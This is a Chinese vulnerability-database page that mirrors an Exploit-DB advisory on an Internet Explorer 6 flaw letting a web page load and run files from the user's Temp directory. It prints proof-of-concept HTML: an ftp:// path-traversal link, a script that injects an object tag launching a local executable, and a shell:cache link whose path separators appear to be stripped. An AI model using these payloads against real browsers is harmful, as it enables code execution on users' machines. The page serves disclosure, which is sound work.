Microsoft Internet Explorer 6 – ‘%USERPROFILE%’ File Execution

Microsoft Internet Explorer 6 – ‘%USERPROFILE%’ File Execution

漏洞ID 1053936 漏洞类型
发布时间 2003-06-05 更新时间 2003-06-05
图片[1]-Microsoft Internet Explorer 6 – ‘%USERPROFILE%’ File Execution-安全小百科CVE编号 N/A
图片[2]-Microsoft Internet Explorer 6 – ‘%USERPROFILE%’ File Execution-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22734
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7826/info

Microsoft Internet Explorer is prone to an issue which could permit an attacker to load a known, existing file in a user's temporary directory (or possibly other directories in a user's profile). It is possible to exploit this issue via a malicious web page or HTML document. Exploitation would either require that an attacker already knows of a file in the user's temporary directory or that the attacker can place an arbitrary file in this directory.

This issue was reported to affect Internet Explorer 6, however, earlier versions may also be prone to this weakness. 

[ftpexp.html]
<html>
<a href="ftp://%@/../../../../Local Settings/Temp/exploit.html" TYPE="text/html" target="_blank">Exploit</a>
</html>

The must click the exploit link, which loads the following file (which must exist in the user's Temp directory):

[exploit.html]
<html>
<script>setTimeout(function(){document.body.innerHTML='<object classid="clsid:11111111-1111-1111-1111-111111111111"
codebase="file://c:/winnt/notepad.exe"></object>'}, 0);</script>
</html>

The following will read the file %TEMP%exploit.html on a Windows 2003 system:

<a href="shell:cache....Local SettingsTempexploit.html">Exploit</a>

相关推荐: Linked Eggdrop IRC Bot Unauthorized Proxy Vulnerability

Linked Eggdrop IRC Bot Unauthorized Proxy Vulnerability 漏洞ID 1100839 漏洞类型 Access Validation Error 发布时间 2003-02-10 更新时间 2003-02-10 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享